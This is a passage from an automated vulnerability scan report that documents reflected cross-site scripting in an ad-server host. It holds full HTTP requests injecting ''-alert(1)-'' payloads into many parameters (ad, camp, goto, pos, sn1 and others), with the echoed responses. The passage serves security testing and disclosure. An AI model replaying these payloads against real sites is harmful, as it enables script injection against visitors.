GET /adi/N6080.149339.8804879051621/B4137193.79;sz=180x150;ord=101273807?click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://redcated/APM/iview/yhxxxdrv0010001133apm/direct;wi.180;hi.150/01?time=0.14199027403169878&click=http://global.ard.yahoo.com/SIG=15m7sl0eq/M=782480.14428769.14283335.8781275/D=news/S=81121452:REC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 19 Nov 2010 23:26:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6714

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698http://lp.21st.com/sp/?pid=10486EYBDWK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var
...[SNIP]...

2.16. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4db8c'-alert(1)-'76a9a340a18 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.54db8c'-alert(1)-'76a9a340a18&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.54db8c'-alert(1)-'76a9a340a18&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.17. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85571'-alert(1)-'e0c602a890c was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt185571'-alert(1)-'e0c602a890c&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt185571'-alert(1)-'e0c602a890c&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.18. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d7b'-alert(1)-'549109f08e8 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=87d7b'-alert(1)-'549109f08e8 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
age=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=87d7b'-alert(1)-'549109f08e8http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a860'-alert(1)-'40e767fbc22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=&6a860'-alert(1)-'40e767fbc22=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:55:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 688

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/126/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
ge=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=&6a860'-alert(1)-'40e767fbc22=1http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.20. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f99'-alert(1)-'151cd29a63c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html18f99'-alert(1)-'151cd29a63c&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html18f99'-alert(1)-'151cd29a63c&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/pro
...[SNIP]...

2.21. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b0aa'-alert(1)-'df99fff59 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2b0aa'-alert(1)-'df99fff59&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:51:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 683

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/121/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2b0aa'-alert(1)-'df99fff59&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865c
...[SNIP]...

2.22. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9448d'-alert(1)-'fc0bfd338ee was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9448d'-alert(1)-'fc0bfd338ee&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C9448d'-alert(1)-'fc0bfd338ee&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=
...[SNIP]...

2.23. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c063b'-alert(1)-'67246c81f2f was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865ccc063b'-alert(1)-'67246c81f2f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:54:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865ccc063b'-alert(1)-'67246c81f2f&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.24. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68e3'-alert(1)-'7c564df6c49 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178e68e3'-alert(1)-'7c564df6c49&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178e68e3'-alert(1)-'7c564df6c49&snr=doubleclick&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.25. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f627'-alert(1)-'38dd3681b12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.20.00.51.06;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick1f627'-alert(1)-'38dd3681b12&snx=1290213345&sn1=618fbb96/abc865cc&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 00:53:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nyt
...[SNIP]...
com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5&sn2=ead05e9b/336cb178&snr=doubleclick1f627'-alert(1)-'38dd3681b12&snx=1290213345&sn1=618fbb96/abc865cc&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...

2.26. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442a2'-alert(1)-'cd57e5a21a7 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

